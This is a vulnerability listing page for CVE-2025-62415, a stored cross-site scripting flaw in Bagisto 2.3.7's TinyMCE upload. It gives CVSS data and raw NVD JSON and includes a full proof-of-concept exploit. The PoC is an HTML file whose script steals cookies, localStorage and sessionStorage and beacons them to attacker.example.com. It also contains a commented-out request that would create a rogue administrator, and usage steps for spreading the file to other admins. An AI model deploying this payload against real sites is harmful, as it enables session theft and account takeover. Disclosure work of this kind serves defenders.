Security Vulnerability Report
中文
CVE-2025-62415 CVSS 6.9 MEDIUM

CVE-2025-62415

Published: 2025-10-16 19:15:34
Last Modified: 2025-10-22 17:21:31
Source: [email protected]

Description

Bagisto is an open source laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser. This vulnerability is fixed in 2.3.8.

CVSS Details

CVSS Score
6.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:* - VULNERABLE
Bagisto < 2.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62415 PoC: Bagisto TinyMCE Stored XSS via HTML File Upload --> <!-- Step 1: Login to Bagisto admin panel with valid credentials --> <!-- Step 2: Navigate to a page using TinyMCE editor (e.g., product description, CMS page) --> <!-- Step 3: Use the image upload functionality to upload the following HTML file --> <!-- malicious_upload.html --> <!DOCTYPE html> <html> <head> <title>Product Image</title> </head> <body> <h1>Product Image</h1> <!-- Malicious JavaScript payload --> <script> // Step 4: When admin/user views this file in browser, the script executes // Exfiltrate session cookies and CSRF tokens to attacker's server var attackerServer = "https://attacker.example.com/collect"; var stolenData = { cookies: document.cookie, url: window.location.href, // Attempt to fetch admin API endpoints to steal sensitive data localStorage: JSON.stringify(localStorage), sessionStorage: JSON.stringify(sessionStorage) }; // Send stolen data to attacker server var img = new Image(); img.src = attackerServer + "?data=" + encodeURIComponent(JSON.stringify(stolenData)); // Optional: Perform actions as the admin (e.g., create new admin user) // fetch('/admin/customers/store', { // method: 'POST', // headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': document.querySelector('meta[name="csrf-token"]').content }, // body: JSON.stringify({ email: '[email protected]', password: 'P@ssw0rd!', role: 'Administrator' }) // }); </script> <img src="legitimate_image.png" alt="Product" /> </body> </html> <!-- Usage Instructions: 1. Save the above content as "malicious_upload.html" or "malicious_upload.htm" 2. Login to Bagisto admin panel as an administrator 3. Open any TinyMCE editor (e.g., in product creation, category description, CMS pages) 4. Click the image upload button and select the malicious HTML file 5. Share the uploaded file URL with other admins/users 6. When they view the file, the malicious JavaScript executes in their browser context -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62415", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:34.340", "lastModified": "2025-10-22T17:21:31.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser. This vulnerability is fixed in 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-87"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:*", "matchCriteriaId": "991C244A-9DC2-431C-8ABC-BCF3AE81AD09"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.